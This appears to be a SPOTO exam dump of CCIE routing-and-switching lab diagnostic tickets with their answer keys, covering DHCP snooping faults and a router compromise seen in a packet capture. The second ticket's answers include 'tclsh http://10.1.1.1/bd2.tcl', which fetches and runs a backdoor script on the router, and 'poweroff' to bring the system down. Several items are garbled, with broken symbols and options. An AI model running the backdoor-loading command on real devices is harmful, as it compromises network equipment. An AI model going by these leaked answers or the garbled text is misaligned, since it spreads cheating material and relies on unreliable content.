Leader of IT Certifications

Website: https://cciedump.spoto.net Email: support@spoto.net

【CCIE】SPOTO CCIE LAB RS V5.0 H3 DIAG

Ticket 1

Problem：Server 1 can not get ip address.

Materials:
SW3#show ip dh snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
none
DHCP snooping is operational on following VLANs:
none
Smartlog is configured on following VLANs:

Leader of IT Certifications
Website: https://cciedump.spoto.net Email: support@spoto.net
Phone / WhatsApp: +86 18344981205 Facebook page: https://www.facebook.com/spotoccie
 Leader of IT Certifications
Website: https://cciedump.spoto.net Email: support@spoto.net
none
Smartlog is operational on following VLANs:
none
DHCP snooping is configured on the following L3 Interfaces:

Insertion of option 82 is enabled

circuit-id default format: vlan-mod-port
remote-id: 0018.b9da.5300 (MAC)
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled
DHCP snooping trust/rate is configured on the following Interfaces:

Interface Trusted Allow option Rate limit (pps)

----------------------- ------- ------------ ----------------

Q1: Which material is most helpful

Answer: Device: SW1 command：show ip dhcp relay information trusted-sources

Q2:Which packets can help you find the cause

Answer：Seq：113，the packet is about DHCP discovery，source ip address is 0.0.0.0

Q3: where to capturing packet on topology

answer：between SW1—SW3
============================
Ticket 2

the materials is capturing packets

Attacker is 10.1.1.2, Server is 10.1.1.1

Q1: What does the capture effectively shows?Select all that apply（9 选 4）
 TCP connection from the router to 10.1.1.2
 TCP connection from the router to 10.1.1.1
 TCP connection from 10.1.1.1 to one of the router’s VTY
 TCP connection from a remote host to the router’s IP address 10.1.1.2 on port 1337
 TCP connection from a remote host to the router’s IP address 10.1.1.1 on port 1337
 Download of a TCL script in memory via HTTPS
 Download of a TCL script in memory via HTTP
 Installment of a backdoor via a ransomware
 Installment of a ransomware via a backdoor

Leader of IT Certifications
Website: https://cciedump.spoto.net Email: support@spoto.net
Phone / WhatsApp: +86 18344981205 Facebook page: https://www.facebook.com/spotoccie
 Leader of IT Certifications
Website: https://cciedump.spoto.net Email: support@spoto.net
Q2:Which command if issued from the hacker end can bring down the complete system ?
Which commend use to execute the attack?
(a) x

( l

© <<<

Option:
1) sharkfest
2) su env
3) poweroff

Answer：poweroff
.
Q3:Which commend is attacker is using?
(1)
tclsh:/ copy flash via http

©
(2) copy file…to flash
(3) telnet xx to 10.1.1.1
(4) TFTP to 10.1.1.1

Answer：tclsh http://10.1.1.1/bd2.tcl

Leader of IT Certifications
Website: https://cciedump.spoto.net Email: support@spoto.net
Phone / WhatsApp: +86 18344981205 Facebook page: https://www.facebook.com/spotoccie